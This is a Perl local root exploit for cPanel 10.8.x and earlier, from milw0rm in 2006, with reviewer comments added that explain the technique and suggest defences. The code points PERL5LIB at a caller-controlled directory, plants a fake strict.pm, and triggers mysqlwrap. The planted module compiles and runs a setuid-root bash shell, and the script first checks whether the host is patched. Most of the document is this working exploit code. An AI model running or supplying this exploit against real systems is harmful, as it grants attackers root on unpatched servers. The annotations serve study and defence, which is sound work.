1 #!/usr/bin/perl −w
2
3 # 10/01/06 − cPanel <= 10.8.x cpwrap root exploit via mysqladmin
4 # use strict; # haha oh wait..
5
# Local privilege-escalation proof of concept against cPanel's cpwrap/mysqlwrap
# helpers (the header comment names cPanel <= 10.8.x). Flow visible in this listing:
#   1. point PERL5LIB at the current directory;
#   2. stop unless gcc and both wrappers are executable and the cpwrap file
#      does not contain the string REMOTE_USER;
#   3. write a file named strict.pm into the current directory;
#   4. run "mysqlwrap DUMPMYSQL";
#   5. look for a file named Maildir and run it.
# NOTE(review): the wrapper internals are not shown here. The technique presumably
# relies on something behind mysqlwrap starting Perl with elevated privileges while
# still honouring the caller's PERL5LIB -- confirm against the vendor advisory.
# Defensive takeaway: a privileged wrapper should build a clean environment
# (no PERL5LIB / PERLLIB from the caller) before executing anything, and
# privileged Perl should run in taint mode (-T), where PERL5LIB and PERLLIB
# are not consulted.
# NOTE(review): the listing carries extraction artifacts (gutter numbers and
# typographic minus/quote characters); it is reproduced as found.
6 my $cpwrap = "/usr/local/cpanel/bin/cpwrap";
7 my $mysqlwrap = "/usr/local/cpanel/bin/mysqlwrap";
# Capture the working directory; it becomes the module search path below.
8 my $pwd = ‘pwd‘;
9
10 chomp $pwd;
# PERL5LIB is inherited by child processes and is searched before the standard
# library, so a Perl interpreter started further down the chain would resolve
# modules from this caller-controlled directory first.
11 $ENV{’PERL5LIB’} = "$pwd";
12
# Pre-flight checks: a compiler and both wrapper binaries must be executable.
13 if ( ! −x "/usr/bin/gcc" ) { die "gcc: $!\n"; }
14 if ( ! −x "$cpwrap" ) { die "$cpwrap: $!\n"; }
15 if ( ! −x "$mysqlwrap" ) { die "$mysqlwrap: $!\n"; }
16
# Patch detection: the script scans the cpwrap file for the string REMOTE_USER
# and treats its presence as the marker of a fixed build.
# NOTE(review): for an administrator, comparing the installed cPanel version with
# the vendor's fixed release is a more reliable check than this string match.
17 open (CPWRAP, "<$cpwrap") or die "Could not open $cpwrap: $!\n";
18 while(<CPWRAP>) {
19 if(/REMOTE_USER/) { die "$cpwrap is patched.\n"; }
20 }
21 close (CPWRAP);
22
# Write the substitute module. The name strict.pm is presumably chosen so that a
# "use strict" in the privileged Perl code loads this file via PERL5LIB.
# The statements written into it: emit a C source whose main() calls
# setreuid(0,0)/setregid(0,0) and spawns /bin/bash, compile it with gcc as
# "Maildir", set mode 4755 on the result, then delete Maildir.c and strict.pm.
# Forensic artifacts implied by these lines: a setuid binary (mode 4755) named
# Maildir in a user-writable directory, a gcc run in that directory, and a
# strict.pm outside Perl's own library tree. On success the generated code
# removes Maildir.c and strict.pm, so only the Maildir binary is left behind.
23 open (STRICT, ">strict.pm") or die "Can’t open strict.pm: $!\n";
24 print STRICT "\$e = \"int main(){setreuid(0,0);setregid(0,0);system(\\\\\\\"/bin/bash\\\\\\\");}\";\n";
25 print STRICT "system(\"/bin/echo −n \\\"\$e\\\">Maildir.c\");\n";
26 print STRICT "system(\"/usr/bin/gcc Maildir.c −o Maildir\");\n";
27 print STRICT "system(\"/bin/chmod 4755 Maildir\");\n";
28 print STRICT "system(\"/bin/rm −f Maildir.c strict.pm\");\n";
29 close (STRICT);
30
# Trigger: run the wrapper with the DUMPMYSQL argument; stderr is discarded.
31 system("$mysqlwrap DUMPMYSQL 2>/dev/null");
32
# Outcome check: the existence of ./Maildir is taken as success and the file is
# run; otherwise the dropped strict.pm is removed and the script exits "Failed".
33 if ( −e "Maildir" ) {
34 system("./Maildir");
35 }
36 else {
37 unlink "strict.pm";
38 die "Failed\n";
39 }
40
41 # milw0rm.com [2006−10−01]
cPanel 10.8.x cpwrap via mysqladmin Local Root Exploit
Clint Torrez
10/01/2006